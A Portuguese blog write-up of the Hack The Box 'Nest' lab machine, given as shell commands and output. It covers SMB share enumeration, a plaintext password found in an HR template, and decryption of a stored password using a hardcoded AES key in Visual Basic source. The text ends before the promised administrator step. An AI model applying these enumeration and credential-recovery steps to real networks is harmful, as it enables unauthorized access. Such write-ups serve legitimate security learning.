Matheus Bratfisch Cogito ergo sum

Hackthebox - Write up of Nest machine

Como vocês sabem, eu tenho estudado pentest. Recentemente eu me cadastrei no hackthebox.eu e comecei a fazer as máquinas faceis.

Este post vai mostrar passo a passo que eu fiz para conseguir a flag de usuário e de administrator.

Eu sempre começo com nmap:

$ nmap -T4 -Pn -p- -v 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 21:41 EDT
Initiating Parallel DNS resolution of 1 host. at 21:41
Completed Parallel DNS resolution of 1 host. at 21:41, 0.01s elapsed
Initiating Connect Scan at 21:41
Scanning 10.10.10.178 (10.10.10.178) [65535 ports]
Discovered open port 445/tcp on 10.10.10.178
Connect Scan Timing: About 3.75% done; ETC: 21:55 (0:13:16 remaining)
Connect Scan Timing: About 16.48% done; ETC: 21:47 (0:05:09 remaining)
Connect Scan Timing: About 39.14% done; ETC: 21:45 (0:02:21 remaining)
Connect Scan Timing: About 66.62% done; ETC: 21:44 (0:01:01 remaining)
Discovered open port 4386/tcp on 10.10.10.178
Completed Connect Scan at 21:44, 220.62s elapsed (65535 total ports)
Nmap scan report for 10.10.10.178 (10.10.10.178)
Host is up (0.15s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
4386/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 220.71 seconds

A porta 4386 parece diferente, vamos tentar fazer um telnet nela e enumera-la:

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>debug 1

Invalid password entered
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days

Current Directory: ALL QUERIES
>setdir C:\Windows\Temp

Error: Access to the path 'C:\Windows\Temp\' is denied.
>

Agora vamos ver o que temos no samba:

$ smbclient -L \\\\10.10.10.178\\
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
SMB1 disabled -- no workgroup available

Listando tudo com smbmap:

$ smbmap -H 10.10.10.178 -R --depth 10 -p a
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        .\Shared\
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .                                                  
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser

Baixar os arquivos que encontramos:

$ smbget -R smb://10.10.10.178/Data/Shared 
Password for [kali] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user kali
smb://10.10.10.178/Data/Shared/Maintenance/Maintenance Alerts.txt                                                   
smb://10.10.10.178/Data/Shared/Templates/HR/Welcome Email.txt                             
Downloaded 473b in 11 seconds

Perfeito temos algo, vamos verificar o que temos dentro destes arquivos:

$ cat Templates/HR/Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
kali@kali:~/sharedcat Maintenance/Maintenance\ Alerts.txt 
There is currently no scheduled maintenance work

Tentando listar tudo com essa nova credencial:

$ smbmap -H 10.10.10.178 -R --depth 10 -u TempUser -p welcome2019
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .                                                  
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 18:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 17:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 17:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    Shared
        .\IT\
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    .
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    ..
        dr--r--r--                0 Wed Aug  7 18:58:07 2019    Archive
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    Configs
        dr--r--r--                0 Wed Aug  7 18:08:30 2019    Installs
        dr--r--r--                0 Sat Jan 25 19:09:13 2020    Reports
        dr--r--r--                0 Mon Aug  5 18:33:51 2019    Tools
        .\IT\Configs\
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    .
        dr--r--r--                0 Wed Aug  7 18:59:34 2019    ..
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    Adobe
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    Atlas
        dr--r--r--                0 Tue Aug  6 09:27:08 2019    DLink
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    Microsoft
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    NotepadPlusPlus
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    RU Scanner
        dr--r--r--                0 Tue Aug  6 09:27:09 2019    Server Manager
        .\IT\Configs\Adobe\
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    .
        dr--r--r--                0 Wed Aug  7 15:20:13 2019    ..
        -r--r--r--              246 Wed Aug  7 15:20:13 2019    editing.xml
        -r--r--r--                0 Wed Aug  7 15:20:09 2019    Options.txt
        -r--r--r--              258 Wed Aug  7 15:20:09 2019    projects.xml
        -r--r--r--             1274 Wed Aug  7 15:20:09 2019    settings.xml
        .\IT\Configs\Atlas\
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    .
        dr--r--r--                0 Tue Aug  6 07:16:34 2019    ..
        -r--r--r--             1369 Tue Aug  6 07:18:38 2019    Temp.XML
        .\IT\Configs\Microsoft\
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    .
        dr--r--r--                0 Wed Aug  7 15:23:26 2019    ..
        -r--r--r--             4598 Wed Aug  7 15:23:26 2019    Options.xml
        .\IT\Configs\NotepadPlusPlus\
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    .
        dr--r--r--                0 Wed Aug  7 15:33:54 2019    ..
        -r--r--r--             6451 Wed Aug  7 19:01:25 2019    config.xml
        -r--r--r--             2108 Wed Aug  7 19:00:36 2019    shortcuts.xml
        .\IT\Configs\RU Scanner\
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    .
        dr--r--r--                0 Wed Aug  7 16:01:13 2019    ..
        -r--r--r--              270 Thu Aug  8 15:49:37 2019    RU_config.xml
        .\Shared\
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 15:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 15:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 15:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 15:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 18:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        .                                                  
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        Secure$                                                 READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        .                                                  
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 18:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 11:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 02:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 13:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 13:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    TempUser
        .\TempUser\
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    .
        dr--r--r--                0 Wed Aug  7 18:56:02 2019    ..
        -r--r--r--                0 Wed Aug  7 18:56:02 2019    New Text Document.txt

Baixando tudo novamente:

$ smbget -R smb://10.10.10.178/Data/IT/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data/IT//Configs/Adobe/editing.xml                                                 
smb://10.10.10.178/Data/IT//Configs/Adobe/Options.txt                                                
smb://10.10.10.178/Data/IT//Configs/Adobe/projects.xml                                               
smb://10.10.10.178/Data/IT//Configs/Adobe/settings.xml                                                   
smb://10.10.10.178/Data/IT//Configs/Atlas/Temp.XML                                                
smb://10.10.10.178/Data/IT//Configs/Microsoft/Options.xml                                    
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/config.xml                            
smb://10.10.10.178/Data/IT//Configs/NotepadPlusPlus/shortcuts.xml                            
smb://10.10.10.178/Data/IT//Configs/RU Scanner/RU_config.xml   

Se nós verificarmos os arquivos nós conseguimos ver uma senha no RU_config.xml

$ cat Configs/RU\ Scanner/RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

Olhando os outros arquivos conseguimos ver umas outras coisas interessantes:

$ tail Configs/NotepadPlusPlus/config.xml 
        <Find name="redeem on" />
        <Find name="192" />
        <Replace name="C_addEvent" />
    </FindHistory>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>
</NotepadPlus>

Verificando Temp.xml

$ cat Configs/Atlas/Temp.XML 
<?xml version="1.0" encoding="UTF-8"?>
<bs:Brainstorm xmlns:bs="http://schemas.microsoft.com/visio/2003/brainstorming"><bs:topic bs:TopicID="T1"><bs:text>Marketing Plan</bs:text><bs:topic bs:TopicID="T1.1"><bs:text>Product</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Deanna Meyer</bs:value></bs:prop><bs:topic bs:TopicID="T1.1.1"><bs:text>New features</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.2"><bs:text>Competitive strengths</bs:text></bs:topic><bs:topic bs:TopicID="T1.1.3"><bs:text>Competitive weaknesses</bs:text></bs:topic></bs:topic><bs:topic bs:TopicID="T1.2"><bs:text>Placement</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Jolie Lenehan</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.3"><bs:text>Price</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop></bs:topic><bs:topic bs:TopicID="T1.4"><bs:text>Promotion</bs:text><bs:prop><bs:id>1</bs:id><bs:label>Assigned to</bs:label><bs:value>Robert O'Hara</bs:value></bs:prop><bs:topic bs:TopicID="T1.4.1"><bs:text>Advertising</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.2"><bs:text>Mailings</bs:text></bs:topic><bs:topic bs:TopicID="T1.4.3"><bs:text>Trade shows</bs:text></bs:topic></bs:topic></bs:topic><bs:association bs:topic1="T1.4" bs:topic2="T1.3"/></bs:Brainstorm>

Temos alguns possiveis nomes para usuário. Como nós já sabemos pelos arquivos recentes, podemos tentar acessa-lo diretamente:

$ smbmap -H 10.10.10.178 -R Secure$/IT/Carl --depth 10 -p welcome2019 -u TempUser
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        .                                                  
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 15:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 19:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 06:59:25 2019    IT
        Secure$                                                 READ ONLY
        .IT\Carl\
        dr--r--r--                0 Wed Aug  7 15:42:14 2019    .
        dr--r--r--                0 Wed Aug  7 15:42:14 2019    ..
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    Docs
        dr--r--r--                0 Tue Aug  6 09:45:47 2019    Reports
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    VB Projects
        .IT\Carl\Docs\
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    .
        dr--r--r--                0 Wed Aug  7 15:44:00 2019    ..
        -r--r--r--               56 Wed Aug  7 15:44:16 2019    ip.txt
        -r--r--r--               73 Wed Aug  7 15:43:46 2019    mmc.txt
        .IT\Carl\VB Projects\
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    .
        dr--r--r--                0 Tue Aug  6 10:41:55 2019    ..
        dr--r--r--                0 Tue Aug  6 10:41:53 2019    Production
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    WIP
        .IT\Carl\VB Projects\WIP\
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    .
        dr--r--r--                0 Tue Aug  6 10:47:41 2019    ..
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    RU
        .IT\Carl\VB Projects\WIP\RU\
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    .
        dr--r--r--                0 Fri Aug  9 11:36:45 2019    ..
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    RUScanner
        -r--r--r--              871 Fri Aug  9 11:36:35 2019    RUScanner.sln
        .IT\Carl\VB Projects\WIP\RU\RUScanner\
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    .
        dr--r--r--                0 Wed Aug  7 18:05:54 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    bin
        -r--r--r--              772 Wed Aug  7 18:05:09 2019    ConfigFile.vb
        -r--r--r--              279 Wed Aug  7 18:05:44 2019    Module1.vb
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    My Project
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    obj
        -r--r--r--             4828 Fri Aug  9 11:38:30 2019    RU Scanner.vbproj
        -r--r--r--              143 Wed Aug  7 16:00:28 2019    RU Scanner.vbproj.user
        -r--r--r--              133 Wed Aug  7 18:05:58 2019    SsoIntegration.vb
        -r--r--r--             4888 Wed Aug  7 18:06:03 2019    Utils.vb
        .IT\Carl\VB Projects\WIP\RU\RUScanner\bin\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    Debug
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    Release
        .IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        -r--r--r--              441 Wed Aug  7 16:00:11 2019    Application.Designer.vb
        -r--r--r--              481 Wed Aug  7 16:00:11 2019    Application.myapp
        -r--r--r--             1163 Wed Aug  7 16:00:11 2019    AssemblyInfo.vb
        -r--r--r--             2776 Wed Aug  7 16:00:11 2019    Resources.Designer.vb
        -r--r--r--             5612 Wed Aug  7 16:00:11 2019    Resources.resx
        -r--r--r--             2989 Wed Aug  7 16:00:11 2019    Settings.Designer.vb
        -r--r--r--              279 Wed Aug  7 16:00:11 2019    Settings.settings
        .IT\Carl\VB Projects\WIP\RU\RUScanner\obj\
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    .
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    ..
        dr--r--r--                0 Wed Aug  7 16:00:11 2019    x86

Vários novos arquivos, baixando os mesmos:

$ smbget -R smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178: 
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt                                                                                                            
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt                                                                                                           
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb                                                                             
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb                                                                                
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb                                                        
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp                                                              
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb                                                                
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb                                                          
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx                                                                 
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb                                                           
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings                                                              
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj                                                                         
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user                                                                    
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb                                                                         
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb                                                                                  
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln                                                                                       
Downloaded 25.18kB in 39 seconds

Verificando o conteúdo deles:

$ cat VB\ Projects/WIP/RU/RUScanner/Module1.vb 
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

    End Sub

End Module

Isso parece apontar que o mesmo utiliza RU_Config.xml que encontramos anteriormente. Olhando mais atentamente no Utils.vb:

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

Isso parece relacionado com a senha que encontramos, se modificarmos o arquivo um pouco:

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1
    Public Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

        Public Sub Main()
                Dim plain As String
                plain = DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
                Console.WriteLine(plain)
        End Sub
End Module

Lembre-se que o DecryptString recebe o parametro do RU_config.xml

Rodando este script no dotnetfiddle.net nós obtemos: “xRxRxPANCAK3SxRxRx” portanto o user c.smith tem essa senha. Tentando listar os arquivos novamente com esse usuário e senha:

$ smbmap -H 10.10.10.178 -R --depth 10 -p xRxRxPANCAK3SxRxRx -u C.Smith

Nós conseguimos ver vários arquivos diferentes e conseguir a flag de usuário. Baixando tudo novamente.

$ smbget -R smb://10.10.10.178/Users/C.Smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178: 
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe                                                          
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt                               
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml                              
smb://10.10.10.178/Users/C.Smith/user.txt                                
Downloaded 17.27kB in 12 seconds

Debug mode password.txt está vazio, o que parece estranho mas tentando conseguir mais informações sobre o mesmo:

$ smbclient -H \\\\10.10.10.178\\Users/ -U c.smith
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\c.smith's password: 
Try "help" to get a list of possible commands.
smb: \> cd C.Smith
dirsmb: \C.Smith\> dir
  .                                   D        0  Sun Jan 26 02:21:44 2020
  ..                                  D        0  Sun Jan 26 02:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 19:06:17 2019
  user.txt                            A       32  Thu Aug  8 19:05:24 2019
cd 
                10485247 blocks of size 4096. 6543375 blocks available
smb: \C.Smith\> cd HQK Reporting\
cd \C.Smith\HQK\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \C.Smith\> cd "HQK Reporting" 
smb: \C.Smith\HQK Reporting\> dir
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
